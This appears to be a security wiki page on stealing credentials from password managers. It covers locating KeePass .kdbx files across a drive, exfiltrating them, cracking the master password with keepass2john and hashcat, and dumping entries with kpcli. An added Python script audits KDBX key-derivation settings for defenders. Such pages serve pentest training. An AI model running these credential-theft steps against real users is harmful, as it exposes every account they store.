Password managers

MITRE ATT&CK™ Credentials from Password Stores: Password Managers - Technique T1555.005

Theory

Password managers generate and securely store passwords of various services, safeguarding them under a single master password. This master password serves as the key to access all the stored passwords within the password manager.

Examples of Password Manager applications:

However, misconfigurations and security flaws in these applications can let us access the stored data. Various tools can be used during the enumeration stage to retrieve sensitive data from the password managers used by Internet browsers and desktop applications.

Practice

KeePass

Cracking Master Password

If we gain access to the KeePass database, we may be able to extract it and crack the database's master password.

A KeePass database is stored as a .kdbx file. We can search for such files using the following commands:

#PowerShell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

#Cmd
dir /s /b C:\*.kdbx

Once we exfiltrate the database to our attacking computer, we can start by running keepass2john and saving its output as a crackable hash.

keepass2john keepass.kdbx > keepass.hash

Then, we may crack the master password using hashcat. See this page for more details about cracking passwords.

hashcat -a 0 -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt --user

Now we can open the database using kpcli and dump the passwords:

$ kpcli --kdb=db.kdbx
Provide the master password: *************************
kpcli:/> dir
=== Groups ===
Database/

kpcli:/> cd Database
kpcli:/Database> dir
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Sample Entry                                               keepass.info
1. Sample Entry #2                          keepass.info/help/kb/testform.
2. User Company Password

kpcli:/Database> show -f 0
Title: Sample Entry
Uname: User Name
 Pass: Password
  URL: https://keepass.info/
Notes: Notes
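
How costly each master-password guess is in the offline attack above depends on the key-derivation settings stored in the unencrypted KDBX header. The following is an added example, not part of the original page or of KeePass itself, that reads those settings so a defender can audit the .kdbx files found on a host. The function names and the sample header are constructed for illustration, and the field layout is assumed to follow the KDBX 3.x/4 header format.

```python
import struct

SIGNATURE = struct.pack("<II", 0x9AA2D903, 0xB54BFB67)  # KDBX (KeePass 2.x) magic
KDF_NAMES = {  # KDF UUIDs used by KDBX 4
    "c9d9f39a628a4460bf740d08c18a4fea": "AES-KDF",
    "ef636ddf8c29444b91f7a9a403e30a0c": "Argon2d",
    "9e298b1956db4773b23dfc3ec6f0a1e6": "Argon2id",
}
PARAM_LABELS = {"R": "rounds", "I": "iterations", "M": "memory_bytes", "P": "parallelism"}

def parse_variant_dict(buf):
    """Decode a KDBX 4 VariantDictionary into {name: raw value bytes}."""
    items, pos = {}, 2                       # skip the 2-byte dictionary version
    while pos < len(buf) and buf[pos] != 0:  # a type byte of 0 ends the dictionary
        (klen,) = struct.unpack_from("<I", buf, pos + 1)
        key = buf[pos + 5:pos + 5 + klen].decode("utf-8")
        pos += 5 + klen
        (vlen,) = struct.unpack_from("<I", buf, pos)
        items[key] = buf[pos + 4:pos + 4 + vlen]
        pos += 4 + vlen
    return items

def kdbx_kdf_settings(data):
    """Return version and key-derivation settings from the unencrypted KDBX header."""
    if data[:8] != SIGNATURE:
        raise ValueError("not a KDBX (KeePass 2.x) database")
    minor, major = struct.unpack_from("<HH", data, 8)
    info = {"version": f"{major}.{minor}"}
    len_fmt = "<I" if major >= 4 else "<H"   # KDBX 4 uses 32-bit field lengths
    pos = 12
    while pos < len(data):
        field_id = data[pos]
        (flen,) = struct.unpack_from(len_fmt, data, pos + 1)
        pos += 1 + struct.calcsize(len_fmt)
        body, pos = data[pos:pos + flen], pos + flen
        if field_id == 0:                    # end-of-header marker
            break
        if field_id == 6:                    # KDBX 3.x: AES-KDF transform rounds
            info.update(kdf="AES-KDF", rounds=int.from_bytes(body, "little"))
        elif field_id == 11:                 # KDBX 4: KDF parameters dictionary
            params = parse_variant_dict(body)
            info["kdf"] = KDF_NAMES.get(params.get("$UUID", b"").hex(), "unknown")
            for key, label in PARAM_LABELS.items():
                if key in params:
                    info[label] = int.from_bytes(params[key], "little")
    return info

# Constructed sample: a minimal KDBX 3.1 header carrying only the rounds field.
SAMPLE_V3 = (SIGNATURE + struct.pack("<HH", 1, 3)
             + struct.pack("<BHQ", 6, 8, 6000) + struct.pack("<BH", 0, 0))

if __name__ == "__main__":
    print(kdbx_kdf_settings(SAMPLE_V3))
```

For a real database, pass the file's bytes, for example `kdbx_kdf_settings(open(path, "rb").read())`. A low AES-KDF round count makes each guess cheap, while raising it or moving to Argon2 raises the cost of every guess.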
